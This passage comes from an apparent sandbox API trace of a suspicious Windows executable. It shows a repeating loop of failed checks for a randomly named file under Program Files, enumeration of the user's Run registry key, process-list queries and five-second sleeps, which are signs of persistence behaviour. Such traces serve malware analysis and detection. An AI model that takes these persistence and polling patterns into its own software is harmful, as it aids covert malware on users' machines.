DesiredAccess=0x120089, ObjectAttributes=0x19ea24*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x19ea44, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x19ea5c*=0x0, IoStatusBlock=0x19ea44*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0255.563] RtlFreeHeap (HeapHandle=0x400000, Flags=0x0, BaseAddress=0x45c4b8) returned 1 [0255.563] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x19ea64*=0x0, ZeroBits=0x0, RegionSize=0x19ea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x19ea64*=0x2e0000, RegionSize=0x19ea68*=0x10000) returned 0x0 [0255.563] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x2e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x2e0000, ResultLength=0x0) returned 0x0 [0255.655] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x19f0a8*=0x2e0000, RegionSize=0x19f0ac, FreeType=0x8000) returned 0x0 [0255.656] NtDelayExecution (Alertable=0, Interval=0x19ea74*=-50000000) returned 0x0 [0255.656] NtCreateKey (in: KeyHandle=0x19ea74, DesiredAccess=0x20219, ObjectAttributes=0x19e1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x19ea74*=0x14c) returned 0x0 [0255.656] NtEnumerateValueKey (in: KeyHandle=0x14c, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x19e438, Length=0x200, ResultLength=0x19e838 | out: KeyValueInformation=0x19e438, ResultLength=0x19e838) returned 0x0 [0255.656] NtClose (Handle=0x14c) returned 0x0 [0255.656] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtPathName=0x19e820, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0255.657] NtCreateFile (in: FileHandle=0x19e840, DesiredAccess=0x120089, ObjectAttributes=0x19e808*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x19e828, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x19e840*=0x0, IoStatusBlock=0x19e828*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0255.657] RtlFreeHeap (HeapHandle=0x400000, Flags=0x0, BaseAddress=0x45c4b8) returned 1 [0255.657] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtPathName=0x19ea3c, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0255.657] NtCreateFile (in: FileHandle=0x19ea5c, DesiredAccess=0x120089, ObjectAttributes=0x19ea24*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x19ea44, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x19ea5c*=0x0, IoStatusBlock=0x19ea44*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0255.657] RtlFreeHeap (HeapHandle=0x400000, Flags=0x0, BaseAddress=0x45c4b8) returned 1 [0255.657] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x19ea64*=0x0, ZeroBits=0x0, RegionSize=0x19ea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x19ea64*=0x2e0000, RegionSize=0x19ea68*=0x10000) returned 0x0 [0255.657] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x2e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x2e0000, ResultLength=0x0) returned 0x0 [0255.770] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x19f0a8*=0x2e0000, RegionSize=0x19f0ac, FreeType=0x8000) returned 0x0 [0255.771] NtDelayExecution (Alertable=0, Interval=0x19ea74*=-50000000) returned 0x0 [0255.781] NtCreateKey (in: KeyHandle=0x19ea74, DesiredAccess=0x20219, ObjectAttributes=0x19e1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x19ea74*=0x14c) returned 0x0 [0255.781] NtEnumerateValueKey (in: KeyHandle=0x14c, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x19e438, Length=0x200, ResultLength=0x19e838 | out: KeyValueInformation=0x19e438, ResultLength=0x19e838) returned 0x0 [0255.781] NtClose (Handle=0x14c) returned 0x0 [0255.781] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtPathName=0x19e820, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0255.781] NtCreateFile (in: FileHandle=0x19e840, DesiredAccess=0x120089, ObjectAttributes=0x19e808*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x19e828, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x19e840*=0x0, IoStatusBlock=0x19e828*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0255.781] RtlFreeHeap (HeapHandle=0x400000, Flags=0x0, BaseAddress=0x45c4b8) returned 1 [0255.781] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtPathName=0x19ea3c, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0255.781] NtCreateFile (in: FileHandle=0x19ea5c, DesiredAccess=0x120089, ObjectAttributes=0x19ea24*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x19ea44, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x19ea5c*=0x0, IoStatusBlock=0x19ea44*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0255.782] RtlFreeHeap (HeapHandle=0x400000, Flags=0x0, BaseAddress=0x45c4b8) returned 1 [0255.782] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x19ea64*=0x0, ZeroBits=0x0, RegionSize=0x19ea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x19ea64*=0x2e0000, RegionSize=0x19ea68*=0x10000) returned 0x0 [0255.782] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x2e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x2e0000, ResultLength=0x0) returned 0x0 [0255.883] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x19f0a8*=0x2e0000, RegionSize=0x19f0ac, FreeType=0x8000) returned 0x0 [0255.883] NtDelayExecution (Alertable=0, Interval=0x19ea74*=-50000000) returned 0x0 [0255.890] NtCreateKey (in: KeyHandle=0x19ea74, DesiredAccess=0x20219, ObjectAttributes=0x19e1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x19ea74*=0x14c) returned 0x0 [0255.890] NtEnumerateValueKey (in: KeyHandle=0x14c, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x19e438, Length=0x200, ResultLength=0x19e838 | out: KeyValueInformation=0x19e438, ResultLength=0x19e838) returned 0x0 [0255.890] NtClose (Handle=0x14c) returned 0x0 [0255.890] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtPathName=0x19e820, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0255.890] NtCreateFile (in: FileHandle=0x19e840, DesiredAccess=0x120089, ObjectAttributes=0x19e808*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x19e828, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x19e840*=0x0, IoStatusBlock=0x19e828*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0255.891] RtlFreeHeap (HeapHandle=0x400000, Flags=0x0, BaseAddress=0x45c4b8) returned 1 [0255.891] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtPathName=0x19ea3c, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0255.891] NtCreateFile (in: FileHandle=0x19ea5c, DesiredAccess=0x120089, ObjectAttributes=0x19ea24*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x19ea44, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x19ea5c*=0x0, IoStatusBlock=0x19ea44*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0255.891] RtlFreeHeap (HeapHandle=0x400000, Flags=0x0, BaseAddress=0x45c4b8) returned 1 [0255.891] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x19ea64*=0x0, ZeroBits=0x0, RegionSize=0x19ea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x19ea64*=0x2e0000, RegionSize=0x19ea68*=0x10000) returned 0x0 [0255.891] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x2e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x2e0000, ResultLength=0x0) returned 0x0 [0255.991] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x19f0a8*=0x2e0000, RegionSize=0x19f0ac, FreeType=0x8000) returned 0x0 [0255.992] NtDelayExecution (Alertable=0, Interval=0x19ea74*=-50000000) returned 0x0 [0255.999] NtCreateKey (in: KeyHandle=0x19ea74, DesiredAccess=0x20219, ObjectAttributes=0x19e1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x19ea74*=0x14c) returned 0x0 [0256.000] NtEnumerateValueKey (in: KeyHandle=0x14c, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x19e438, Length=0x200, ResultLength=0x19e838 | out: KeyValueInformation=0x19e438, ResultLength=0x19e838) returned 0x0 [0256.000] NtClose (Handle=0x14c) returned 0x0 [0256.000] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtPathName=0x19e820, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0256.000] NtCreateFile (in: FileHandle=0x19e840, DesiredAccess=0x120089, ObjectAttributes=0x19e808*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x19e828, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x19e840*=0x0, IoStatusBlock=0x19e828*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0256.000] RtlFreeHeap (HeapHandle=0x400000, Flags=0x0, BaseAddress=0x45c4b8) returned 1 [0256.000] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtPathName=0x19ea3c, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0256.000] NtCreateFile (in: FileHandle=0x19ea5c, DesiredAccess=0x120089, ObjectAttributes=0x19ea24*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x19ea44, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x19ea5c*=0x0, IoStatusBlock=0x19ea44*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0256.000] RtlFreeHeap (HeapHandle=0x400000, Flags=0x0, BaseAddress=0x45c4b8) returned 1 [0256.000] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x19ea64*=0x0, ZeroBits=0x0, RegionSize=0x19ea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x19ea64*=0x2e0000, RegionSize=0x19ea68*=0x10000) returned 0x0 [0256.001] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x2e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x2e0000, ResultLength=0x0) returned 0x0 [0256.128] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x19f0a8*=0x2e0000, RegionSize=0x19f0ac, FreeType=0x8000) returned 0x0 [0256.129] NtDelayExecution (Alertable=0, Interval=0x19ea74*=-50000000) returned 0x0 [0256.140] NtCreateKey (in: KeyHandle=0x19ea74, DesiredAccess=0x20219, ObjectAttributes=0x19e1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x19ea74*=0x14c) returned 0x0 [0256.140] NtEnumerateValueKey (in: KeyHandle=0x14c, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x19e438, Length=0x200, ResultLength=0x19e838 | out: KeyValueInformation=0x19e438, ResultLength=0x19e838) returned 0x0 [0256.140] NtClose (Handle=0x14c) returned 0x0 [0256.140] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtPathName=0x19e820, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0256.140] NtCreateFile (in: FileHandle=0x19e840, DesiredAccess=0x120089, ObjectAttributes=0x19e808*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x19e828, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x19e840*=0x0, IoStatusBlock=0x19e828*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0256.141] RtlFreeHeap (HeapHandle=0x400000, Flags=0x0, BaseAddress=0x45c4b8) returned 1 [0256.141] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtPathName=0x19ea3c, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0256.141] NtCreateFile (in: FileHandle=0x19ea5c, DesiredAccess=0x120089, ObjectAttributes=0x19ea24*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x19ea44, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x19ea5c*=0x0, IoStatusBlock=0x19ea44*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0256.141] RtlFreeHeap (HeapHandle=0x400000, Flags=0x0, BaseAddress=0x45c4b8) returned 1 [0256.141] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x19ea64*=0x0, ZeroBits=0x0, RegionSize=0x19ea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x19ea64*=0x2e0000, RegionSize=0x19ea68*=0x10000) returned 0x0 [0256.141] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x2e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x2e0000, ResultLength=0x0) returned 0x0 [0256.242] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x19f0a8*=0x2e0000, RegionSize=0x19f0ac, FreeType=0x8000) returned 0x0 [0256.243] NtDelayExecution (Alertable=0, Interval=0x19ea74*=-50000000) returned 0x0 [0256.249] NtCreateKey (in: KeyHandle=0x19ea74, DesiredAccess=0x20219, ObjectAttributes=0x19e1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x19ea74*=0x14c) returned 0x0 [0256.249] NtEnumerateValueKey (in: KeyHandle=0x14c, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x19e438, Length=0x200, ResultLength=0x19e838 | out: KeyValueInformation=0x19e438, ResultLength=0x19e838) returned 0x0 [0256.249] NtClose (Handle=0x14c) returned 0x0 [0256.249] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtPathName=0x19e820, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0256.249] NtCreateFile (in: FileHandle=0x19e840, DesiredAccess=0x120089, ObjectAttributes=0x19e808*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x19e828, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x19e840*=0x0, IoStatusBlock=0x19e828*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0256.249] RtlFreeHeap (HeapHandle=0x400000, Flags=0x0, BaseAddress=0x45c4b8) returned 1 [0256.249] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtPathName=0x19ea3c, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0256.249] NtCreateFile (in: FileHandle=0x19ea5c, DesiredAccess=0x120089, ObjectAttributes=0x19ea24*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x19ea44, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x19ea5c*=0x0, IoStatusBlock=0x19ea44*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0256.250] RtlFreeHeap (HeapHandle=0x400000, Flags=0x0, BaseAddress=0x45c4b8) returned 1 [0256.250] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x19ea64*=0x0, ZeroBits=0x0, RegionSize=0x19ea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x19ea64*=0x2e0000, RegionSize=0x19ea68*=0x10000) returned 0x0 [0256.250] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x2e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x2e0000, ResultLength=0x0) returned 0x0 [0256.350] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x19f0a8*=0x2e0000, RegionSize=0x19f0ac, FreeType=0x8000) returned 0x0 [0256.351] NtDelayExecution (Alertable=0, Interval=0x19ea74*=-50000000) returned 0x0 [0256.358] NtCreateKey (in: KeyHandle=0x19ea74, DesiredAccess=0x20219, ObjectAttributes=0x19e1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x19ea74*=0x14c) returned 0x0 [0256.358] NtEnumerateValueKey (in: KeyHandle=0x14c, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x19e438, Length=0x200, ResultLength=0x19e838 | out: KeyValueInformation=0x19e438, ResultLength=0x19e838) returned 0x0 [0256.358] NtClose (Handle=0x14c) returned 0x0 [0256.358] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtPathName=0x19e820, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0256.359] NtCreateFile (in: FileHandle=0x19e840, DesiredAccess=0x120089, ObjectAttributes=0x19e808*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x19e828, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x19e840*=0x0, IoStatusBlock=0x19e828*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0256.359] RtlFreeHeap (HeapHandle=0x400000, Flags=0x0, BaseAddress=0x45c4b8) returned 1 [0256.359] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtPathName=0x19ea3c, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0256.359] NtCreateFile (in: FileHandle=0x19ea5c, DesiredAccess=0x120089, ObjectAttributes=0x19ea24*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x19ea44, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x19ea5c*=0x0, IoStatusBlock=0x19ea44*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0256.359] RtlFreeHeap (HeapHandle=0x400000, Flags=0x0, BaseAddress=0x45c4b8) returned 1 [0256.359] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x19ea64*=0x0, ZeroBits=0x0, RegionSize=0x19ea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x19ea64*=0x2e0000, RegionSize=0x19ea68*=0x10000) returned 0x0 [0256.359] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x2e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x2e0000, ResultLength=0x0) returned 0x0 [0256.456] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x19f0a8*=0x2e0000, RegionSize=0x19f0ac, FreeType=0x8000) returned 0x0 [0256.457] NtDelayExecution (Alertable=0, Interval=0x19ea74*=-50000000) returned 0x0 [0256.467] NtCreateKey (in: KeyHandle=0x19ea74, DesiredAccess=0x20219, ObjectAttributes=0x19e1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x19ea74*=0x14c) returned 0x0 [0256.467] NtEnumerateValueKey (in: KeyHandle=0x14c, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x19e438, Length=0x200, ResultLength=0x19e838 | out: KeyValueInformation=0x19e438, ResultLength=0x19e838) returned 0x0 [0256.468] NtClose (Handle=0x14c) returned 0x0 [0256.468] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtPathName=0x19e820, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: 